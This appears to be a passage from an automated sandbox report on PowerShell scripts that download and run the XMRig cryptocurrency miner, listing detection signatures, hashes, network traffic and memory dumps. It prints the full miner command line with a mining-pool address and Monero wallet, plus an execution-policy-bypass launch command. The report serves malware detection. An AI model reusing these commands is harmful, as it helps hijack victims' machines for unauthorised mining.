N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp

Files

memory/2908-4-0x00007FFA016F3000-0x00007FFA016F4000-memory.dmp

memory/2908-5-0x000001DA27DD0000-0x000001DA27DF2000-memory.dmp

memory/2908-6-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

memory/2908-9-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

memory/2908-10-0x000001DA27F80000-0x000001DA27FF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zzvcdwnt.5j0.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2908-25-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

memory/2908-48-0x000001DA27F60000-0x000001DA27F72000-memory.dmp

memory/2908-61-0x000001DA27F50000-0x000001DA27F5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4796-90-0x0000021E40C80000-0x0000021E40CA0000-memory.dmp

memory/4796-91-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/2908-93-0x00007FFA016F3000-0x00007FFA016F4000-memory.dmp

memory/4796-92-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/2908-94-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

memory/2908-95-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp

memory/4796-96-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-97-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-98-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-99-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-100-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-101-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-102-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-103-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-104-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-105-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-106-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-107-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-108-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-109-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-110-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-111-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-112-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-113-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-114-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-115-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-116-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-117-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-118-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-119-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-120-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-121-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-122-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-123-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-124-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-125-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-126-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-127-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-128-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-129-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-130-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-131-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-132-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-133-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-134-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-135-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-136-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-137-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-138-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-139-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-140-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-141-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-142-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-143-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-144-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-145-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-146-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-147-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-148-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-149-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-150-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-151-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-152-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-153-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-154-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-155-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

memory/4796-156-0x00007FF7760E0000-0x00007FF776D13000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:33

Platform

win11-20240508-en

Max time kernel

1791s

Max time network

1756s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2084-0-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ify2pwzo.e0m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2084-1-0x00000134F9AB0000-0x00000134F9AD2000-memory.dmp

memory/2084-10-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/2084-11-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/2084-12-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/2084-14-0x00000134F9C90000-0x00000134F9CA2000-memory.dmp

memory/2084-15-0x00000134F9C80000-0x00000134F9C8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/556-46-0x0000020FCDF80000-0x0000020FCDFA0000-memory.dmp

memory/556-47-0x0000020FCF780000-0x0000020FCF7A0000-memory.dmp

memory/556-48-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/2084-49-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/556-52-0x0000020FCF7A0000-0x0000020FCF7C0000-memory.dmp

memory/556-53-0x0000020FCF7C0000-0x0000020FCF7E0000-memory.dmp

memory/556-50-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/2084-51-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp

memory/556-54-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-55-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-57-0x0000020FCF7C0000-0x0000020FCF7E0000-memory.dmp

memory/556-56-0x0000020FCF7A0000-0x0000020FCF7C0000-memory.dmp

memory/556-58-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-59-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-60-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-61-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-62-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-63-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-64-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-65-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-66-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-67-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-68-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-69-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-70-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-71-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-72-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-73-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-74-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-75-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-76-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-77-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-78-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-79-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-80-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-81-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-82-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-83-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-84-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-85-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-86-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-87-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-88-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-89-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-90-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-91-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-92-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-93-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-94-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-95-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-96-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-97-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-98-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-99-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-100-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-101-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-102-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-103-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-104-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-105-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-106-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-107-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-108-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-109-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-110-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-111-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-112-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-113-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-114-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-115-0x00007FF623410000-0x00007FF624043000-memory.dmp

memory/556-116-0x00007FF623410000-0x00007FF624043000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:51

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1749s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp

Files

memory/4480-0-0x00007FFA54793000-0x00007FFA54795000-memory.dmp

memory/4480-7-0x00007FFA54790000-0x00007FFA55251000-memory.dmp

memory/4480-6-0x0000010FF2990000-0x0000010FF29B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3zi5k5zq.ko1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4480-12-0x00007FFA54790000-0x00007FFA55251000-memory.dmp

memory/4480-14-0x00007FFA54790000-0x00007FFA55251000-memory.dmp

memory/4480-15-0x0000010FF2EB0000-0x0000010FF2EC2000-memory.dmp

memory/4480-16-0x0000010FF0800000-0x0000010FF080A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2468-47-0x0000017198C90000-0x0000017198CB0000-memory.dmp

memory/2468-48-0x0000017198EF0000-0x0000017198F10000-memory.dmp

memory/2468-49-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/4480-50-0x00007FFA54793000-0x00007FFA54795000-memory.dmp

memory/4480-51-0x00007FFA54790000-0x00007FFA55251000-memory.dmp

memory/2468-53-0x0000017198F30000-0x0000017198F50000-memory.dmp

memory/2468-52-0x0000017198F10000-0x0000017198F30000-memory.dmp

memory/2468-54-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-55-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/4480-56-0x00007FFA54790000-0x00007FFA55251000-memory.dmp

memory/2468-59-0x0000017198F30000-0x0000017198F50000-memory.dmp

memory/2468-58-0x0000017198F10000-0x0000017198F30000-memory.dmp

memory/2468-57-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-60-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-61-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-62-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-63-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-64-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-65-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-66-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-67-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-68-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-69-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-70-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-71-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-72-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-73-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-74-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-75-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-76-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-77-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-78-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-79-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-80-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-81-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-82-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-83-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-84-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-85-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-86-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-87-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-88-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-89-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-90-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-91-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-92-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-93-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-94-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-95-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

memory/2468-96-0x00007FF751F70000-0x00007FF752BA3000-memory.dmp

